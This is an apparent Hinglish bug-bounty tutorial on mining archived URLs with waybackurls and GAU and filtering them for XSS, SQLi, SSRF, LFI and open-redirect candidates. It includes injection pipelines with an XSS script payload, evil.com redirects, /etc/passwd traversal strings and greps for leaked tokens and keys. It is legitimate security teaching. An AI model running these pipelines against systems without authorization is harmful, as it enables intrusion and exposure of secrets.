Waybackurls + GAU Purane Endpoints Se Bugs Nikalo: Internet Archive Ka Hacking! (Hinglish Mein)

Series: Bug Bounty Zero se Hero 🦸 | Article #12 By HackerMD | 16 min read

Hacker MD

~9 min read · April 13, 2026 (Updated: April 13, 2026) · Free: Yes

Aaj Kya Seekhenge?

Waybackurls aur GAU kya hai basics se
Kyun purane URLs = Fresh bugs
Install karna dono tools
Basic se Elite commands sab kuch
URLs se bugs nikalne ka formula
Parameters dhundho XSS, SQLi, SSRF
Complete Elite Pipeline

Kyun zaroori hai? Developer ne ek endpoint delete kiya lekin Internet Archive ne us URL ko already index kar liya tha! Woh endpoint abhi bhi live hai developer bhaool gaya aur wahan koi security fix nahi hua! Yahi pe milti hain high-value bugs!

Concept Samjho Time Travel Hacking!

Socho ek scenario:

2019 mein:
targetcompany.com/api/v1/users?id=1
→ Yeh endpoint tha

2021 mein:
Developer ne v2 banaya → v1 "delete" kiya
→ Sirf documentation remove ki!
→ Endpoint ABHI BHI LIVE hai!

2026 mein (Tum):
Waybackurls run karo →
/api/v1/users?id=1 milta hai →
Test karo → IDOR vulnerability! 💰

Internet Archive (Wayback Machine) ne 1996 se har website ka snapshot le rakha hai URLs sab stored hain!

Tools Kya Hain?

Waybackurls:

→ tomnomnom ka tool
→ Web Archive se URLs nikalta hai
→ Input: domain
→ Output: hazaron purane URLs

GAU (GetAllUrls):

→ lc/gau by lc (Corben Leo)
→ Multiple sources use karta hai:
   ✅ Wayback Machine
   ✅ AlienVault OTX
   ✅ Common Crawl
   ✅ URLScan.io
→ Waybackurls se zyada comprehensive!

Installation

Waybackurls Install:

# Go se install karo
go install github.com/tomnomnom/waybackurls@latest

# Verify
waybackurls -h ✅

GAU Install:

# Go se install karo
go install github.com/lc/gau/v2/cmd/gau@latest

# Ya apt se
sudo apt install gau -y

# Verify
gau --help ✅

Extra Tools Pipeline Ke Liye:

# qsreplace — parameters replace karne ke liye
go install github.com/tomnomnom/qsreplace@latest

# gf — patterns filter karne ke liye
go install github.com/tomnomnom/gf@latest

# uro — duplicate URLs remove karne ke liye
pip3 install uro

PART 1: Waybackurls Basic Commands

Basic 1: Simple URL Fetch

# Domain ke sabhi archived URLs
echo "example.com" | waybackurls

# Output (example):
# https://example.com/api/v1/users?id=1
# https://example.com/admin/login.php
# https://example.com/backup/db.sql.gz
# https://example.com/config.php.bak
# ... (hazaron URLs!)

Basic 2: File Mein Save Karo

echo "example.com" | waybackurls > all_urls.txt

# Count dekho
wc -l all_urls.txt

Basic 3: No Subdomains Sirf Main Domain

echo "example.com" | waybackurls --no-subs > main_urls.txt

Basic 4: Subdomains Include Karo

# Default mein subdomains bhi include hote hain
echo "example.com" | waybackurls > all_with_subs.txt

# Interesting subdomains ke URLs alag karo
grep "dev\." all_with_subs.txt
grep "staging\." all_with_subs.txt
grep "admin\." all_with_subs.txt

PART 2: GAU Advanced Commands

Basic 1: Simple Fetch

# Single domain
gau example.com

# File mein save
gau example.com --o gau_urls.txt

Basic 2: Specific Sources Choose Karo

# Sirf Wayback Machine
gau --providers wayback example.com

# Sirf OTX
gau --providers otx example.com

# Sirf URLScan
gau --providers urlscan example.com

# Common Crawl bhi include karo
gau --providers wayback,otx,urlscan,commoncrawl \
  example.com

Basic 3: Date Filter Time Range

# Ek specific year ke baad ke URLs
gau --from 2022 example.com

# Date range
gau --from 20220101 --to 20231231 example.com

# Recent URLs sirf
gau --from 2024 example.com > recent_urls.txt

Basic 4: Specific Extensions Filter

# Sirf PHP files
gau example.com | grep "\.php"

# API endpoints
gau example.com | grep "/api/"

# Parameters wale URLs
gau example.com | grep "?"

Basic 5: Rate Limiting

# Workers control karo
gau --threads 5 example.com

# Rate per second
gau --retries 3 example.com

PART 3: Elite Filtering Techniques Sab Se Important!

Raw output bahut noisy hota hai filtering hi real skill hai!

Filter 1: Extensions Remove Karo Useless Files Hata Do

cat all_urls.txt | grep -vE \
  "\.(png|jpg|jpeg|gif|svg|ico|css|woff|woff2|
     ttf|eot|mp4|mp3|pdf|zip|gz)" \
  > filtered_urls.txt

echo "Filtered: $(wc -l < filtered_urls.txt) URLs"

Filter 2: Parameters Wale URLs Bug Hunting Ground!

# Sirf URLs jisme parameters hain
cat filtered_urls.txt | grep "?" > param_urls.txt

echo "URLs with params: $(wc -l < param_urls.txt)"

Filter 3: uro Smart Deduplication

# Similar URLs merge karo — jaise:
# /user?id=1, /user?id=2, /user?id=3
# → Sirf /user?id= rakhega (1 representative URL)

cat all_urls.txt | uro > deduped_urls.txt

echo "Before: $(wc -l < all_urls.txt)"
echo "After: $(wc -l < deduped_urls.txt)"
# Dramatic reduction! 🎯

Filter 4: gf Patterns Vulnerability Specific

gf = grep patterns specifically for security testing!

# gf patterns download karo
git clone https://github.com/1ndianl33t/Gf-Patterns \
  ~/.gf

# Ab patterns use karo:

# XSS ke liye potential parameters
cat deduped_urls.txt | gf xss > xss_candidates.txt

# SQL injection ke liye
cat deduped_urls.txt | gf sqli > sqli_candidates.txt

# SSRF ke liye
cat deduped_urls.txt | gf ssrf > ssrf_candidates.txt

# Open Redirect ke liye
cat deduped_urls.txt | gf redirect > redirect_candidates.txt

# LFI ke liye
cat deduped_urls.txt | gf lfi > lfi_candidates.txt

# IDOR ke liye (id parameters)
cat deduped_urls.txt | gf idor > idor_candidates.txt

# RCE parameters
cat deduped_urls.txt | gf rce > rce_candidates.txt

Filter 5: Interesting File Extensions Direct Bugs!

# Backup files — CRITICAL!
cat all_urls.txt | grep -E "\.(bak|backup|old|orig|copy)" \
  > backup_files.txt

# Config files
cat all_urls.txt | grep -E "\.(env|conf|cfg|ini|xml|yaml|yml)" \
  > config_files.txt

# Database files
cat all_urls.txt | grep -E "\.(sql|db|sqlite|mdb)" \
  > db_files.txt

# Log files
cat all_urls.txt | grep -E "\.(log|txt)" \
  > log_files.txt

# Archive files
cat all_urls.txt | grep -E "\.(zip|tar|gz|7z|rar)" \
  > archive_files.txt

# Script files with params
cat all_urls.txt | grep -E "\.(php|asp|aspx|jsp)\?" \
  > script_params.txt

Filter 6: Sensitive Keywords Goldmine!

# Admin pages
cat all_urls.txt | grep -iE \
  "admin|administrator|manage|manager|dashboard" \
  > admin_urls.txt

# API endpoints
cat all_urls.txt | grep -iE \
  "/api/|/v1/|/v2/|/rest/|/graphql" \
  > api_urls.txt

# Auth related
cat all_urls.txt | grep -iE \
  "login|logout|signup|register|forgot|reset|
   password|token|auth|oauth" \
  > auth_urls.txt

# Upload endpoints
cat all_urls.txt | grep -iE \
  "upload|import|file|attach|media" \
  > upload_urls.txt

# Redirect parameters
cat all_urls.txt | grep -iE \
  "redirect=|next=|url=|return=|goto=|
   returnUrl=|dest=|destination=" \
  > redirect_params.txt

PART 4: Automated Vulnerability Testing

XSS Automation qsreplace + dalfox

# XSS candidates nikalo
cat deduped_urls.txt | gf xss > xss_urls.txt

# qsreplace se payload inject karo
cat xss_urls.txt | \
  qsreplace '"><script>alert(1)</script>' | \
  httpx -silent -mc 200 > xss_reflected.txt

# Dalfox se automated XSS scan karo
cat xss_urls.txt | dalfox pipe --silence \
  -o xss_found.txt

Open Redirect Automation

# Redirect candidates
cat deduped_urls.txt | gf redirect > redirect_urls.txt

# Payload inject karo
cat redirect_urls.txt | \
  qsreplace "https://evil.com" | \
  httpx -silent -location -mc 301,302 | \
  grep "evil.com" > open_redirects.txt

echo "Open Redirects: $(wc -l < open_redirects.txt)"

SSRF Automation

# SSRF candidates
cat deduped_urls.txt | gf ssrf > ssrf_urls.txt

# Burp Collaborator ya interactsh use karo
# interactsh-client chalaao:
interactsh-client &
COLLAB_URL="xxxxx.oast.pro"

# Payload inject karo
cat ssrf_urls.txt | \
  qsreplace "https://$COLLAB_URL" | \
  httpx -silent

# Interactsh mein callbacks dekho → SSRF confirmed!

LFI Testing

# LFI candidates
cat deduped_urls.txt | gf lfi > lfi_urls.txt

# Basic payloads
LFI_PAYLOADS=(
  "../../../../etc/passwd"
  "....//....//....//etc/passwd"
  "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
)

for payload in "${LFI_PAYLOADS[@]}"; do
  cat lfi_urls.txt | \
    qsreplace "$payload" | \
    httpx -silent -mc 200 | \
    httpx -silent -mr "root:x:" >> lfi_found.txt
done

PART 5: Complete Elite Pipeline

#!/bin/bash
# wayback_gau_elite.sh

TARGET=$1
DIR="wayback_${TARGET}"
mkdir -p $DIR

echo "═══════════════════════════════════"
echo "⏰ WAYBACK + GAU ELITE: $TARGET"
echo "═══════════════════════════════════"

# Step 1: URLs collect karo
echo "📡 Step 1: Collecting URLs..."
echo "$TARGET" | waybackurls > $DIR/wayback_urls.txt &
gau --providers wayback,otx,urlscan,commoncrawl \
  $TARGET > $DIR/gau_urls.txt &
wait

echo "✅ Wayback: $(wc -l < $DIR/wayback_urls.txt)"
echo "✅ GAU: $(wc -l < $DIR/gau_urls.txt)"

# Step 2: Combine + deduplicate
echo "🔀 Step 2: Merging..."
cat $DIR/wayback_urls.txt $DIR/gau_urls.txt | \
  sort -u | uro > $DIR/all_unique.txt
echo "✅ Unique: $(wc -l < $DIR/all_unique.txt)"

# Step 3: Filter useless extensions
echo "🧹 Step 3: Filtering..."
cat $DIR/all_unique.txt | grep -vE \
  "\.(png|jpg|jpeg|gif|svg|ico|css|woff|
     woff2|ttf|eot|mp4|mp3)" \
  > $DIR/filtered.txt
echo "✅ Filtered: $(wc -l < $DIR/filtered.txt)"

# Step 4: Categories
echo "📂 Step 4: Categorizing..."
cat $DIR/filtered.txt | grep "?" > $DIR/params.txt
cat $DIR/filtered.txt | \
  grep -iE "admin|dashboard|manage" > $DIR/admin.txt
cat $DIR/filtered.txt | \
  grep -iE "/api/|/v1/|/v2/" > $DIR/api.txt
cat $DIR/filtered.txt | \
  grep -iE "\.(bak|sql|env|conf|log)" > $DIR/sensitive.txt
cat $DIR/filtered.txt | \
  grep -iE "redirect=|next=|url=|return=" > $DIR/redirects.txt

# Step 5: GF Patterns
echo "🎯 Step 5: GF Pattern Matching..."
cat $DIR/params.txt | gf xss > $DIR/xss_cands.txt
cat $DIR/params.txt | gf sqli > $DIR/sqli_cands.txt
cat $DIR/params.txt | gf ssrf > $DIR/ssrf_cands.txt
cat $DIR/params.txt | gf lfi > $DIR/lfi_cands.txt

# Step 6: Live check on sensitive files
echo "🌐 Step 6: Live Check (Sensitive)..."
cat $DIR/sensitive.txt | httpx -silent -mc 200 \
  > $DIR/sensitive_live.txt

# Summary
echo ""
echo "═══════════════════════════════════"
echo "📊 RESULTS: $TARGET"
echo "═══════════════════════════════════"
echo "Total URLs         : $(wc -l < $DIR/all_unique.txt)"
echo "With Parameters    : $(wc -l < $DIR/params.txt)"
echo "Admin URLs         : $(wc -l < $DIR/admin.txt)"
echo "API URLs           : $(wc -l < $DIR/api.txt)"
echo "Sensitive Files    : $(wc -l < $DIR/sensitive.txt)"
echo "Live Sensitive     : $(wc -l < $DIR/sensitive_live.txt)"
echo "XSS Candidates     : $(wc -l < $DIR/xss_cands.txt)"
echo "SQLi Candidates    : $(wc -l < $DIR/sqli_cands.txt)"
echo "SSRF Candidates    : $(wc -l < $DIR/ssrf_cands.txt)"
echo "LFI Candidates     : $(wc -l < $DIR/lfi_cands.txt)"
echo "Redirect Params    : $(wc -l < $DIR/redirects.txt)"
echo "Results in         : $DIR/"
echo "═══════════════════════════════════"

# Usage:
# chmod +x wayback_gau_elite.sh
# ./wayback_gau_elite.sh example.com

PART 6: Hidden Gems Kya Dhundho URLs Mein?

Gem 1: Old API Versions

cat all_urls.txt | grep -E "/v[0-9]+/" | \
  grep -v "v2\|v3" | sort -u
# /api/v1/ → Old version — less secure!
# /api/beta/ → Beta endpoints!

Gem 2: Internal IPs in URLs

cat all_urls.txt | grep -oE \
  "https?://(10|172|192)\.[0-9.]+[/:]" | \
  sort -u
# Internal server URLs publicly accessible! 🔴

Gem 3: JWT Tokens in URLs

cat all_urls.txt | grep -oE \
  "eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+" | \
  sort -u
# JWT tokens in URL = Security issue! 🎯

Gem 4: API Keys in Parameters

cat all_urls.txt | grep -iE \
  "api_key=|apikey=|token=|secret=|password=" | \
  grep -v "REDACTED" | sort -u
# Credentials in URLs! 🔴

Gem 5: Debug/Test Endpoints

cat all_urls.txt | grep -iE \
  "debug|test|dev|temp|tmp|old|backup|
   staging|phpinfo|info\.php" | sort -u
# Development leftovers in production! 🎯

Cheat Sheet Quick Reference

# ─── WAYBACKURLS ──────────────────────────
echo "domain.com" | waybackurls
echo "domain.com" | waybackurls --no-subs
echo "domain.com" | waybackurls > urls.txt

# ─── GAU ──────────────────────────────────
gau domain.com
gau --providers wayback,otx,urlscan domain.com
gau --from 2023 domain.com
gau --threads 5 domain.com

# ─── FILTERING ────────────────────────────
cat urls.txt | uro                         # Deduplicate
cat urls.txt | grep "?"                    # Params only
cat urls.txt | gf xss                      # XSS patterns
cat urls.txt | gf sqli                     # SQLi patterns
cat urls.txt | gf ssrf                     # SSRF patterns
cat urls.txt | gf redirect                 # Redirects
cat urls.txt | gf lfi                      # LFI patterns

# ─── TESTING ──────────────────────────────
cat xss.txt | qsreplace "FUZZ" | httpx -mc 200
cat redirect.txt | qsreplace "https://evil.com" | \
  httpx -location -mc 301,302

# ─── PIPELINE ─────────────────────────────
echo target.com | waybackurls | \
  grep "?" | uro | gf xss | \
  dalfox pipe -o xss_results.txt

Aaj Ka Homework

# 1. Dono tools install karo
waybackurls -h && gau --help

# 2. Legal target pe practice karo
echo "testphp.vulnweb.com" | waybackurls > test_urls.txt
gau testphp.vulnweb.com >> test_urls.txt
cat test_urls.txt | sort -u | uro > unique_test.txt
echo "Total unique: $(wc -l < unique_test.txt)"

# 3. Parameters wale nikalo
cat unique_test.txt | grep "?" > params.txt
echo "With params: $(wc -l < params.txt)"

# 4. XSS candidates
cat params.txt | gf xss > xss_cands.txt
echo "XSS candidates: $(wc -l < xss_cands.txt)"

# 5. Comment mein batao:
# Kitne URLs mile?
# Kaunsa interesting endpoint mila?

Quick Revision

⏰ Waybackurls = Internet Archive se old URLs
🌐 GAU         = 4 sources — maximum coverage
🧹 uro         = Smart URL deduplication
🎯 gf          = Pattern matching — bug types
🔄 qsreplace   = Parameter value replace karo
💎 Hidden Gems = Old APIs, JWT tokens in URLs,
                  Debug endpoints, Backup files
🚀 Pipeline    = GAU → uro → gf → qsreplace →
                  httpx → Bug confirmed!

Meri Baat…

Ek baar maine ek company pe GAU run kiya:

gau targetcorp.com | grep "?" | uro > urls.txt

87,000+ unique URLs mile!

Maine redirect parameters filter kiye:

cat urls.txt | grep -iE "redirect=|next=|url=" > redirects.txt
# 234 URLs mile!

Ek URL tha:

https://targetcorp.com/sso/login?next=https://targetcorp.com/dashboard

Maine next parameter mein apna domain diya:

https://targetcorp.com/sso/login?next=https://evil.com

Open Redirect — $300 bounty! 🎉

Chhoti bounty lekin sirf GAU + ek grep command se mili! 15 minutes ka kaam!

Lesson: Volume game hai bug bounty jitne zyada URLs analyze karo, utne zyada bugs!

Agle article mein Nuclei 9,000+ templates se automated vulnerability scanning! Recon series ka grand finale! 🔥

HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD

Previous: Article #11 Google Dorks Next: Article #13 Nuclei: 9000+ Templates Se Automated Bug Hunting!

#Waybackurls #GAU #BugBounty #Recon #EthicalHacking #Hinglish #URLMining #HackerMD

#waybackurls #usga #bug-bounty #ethical-hacking #urlmining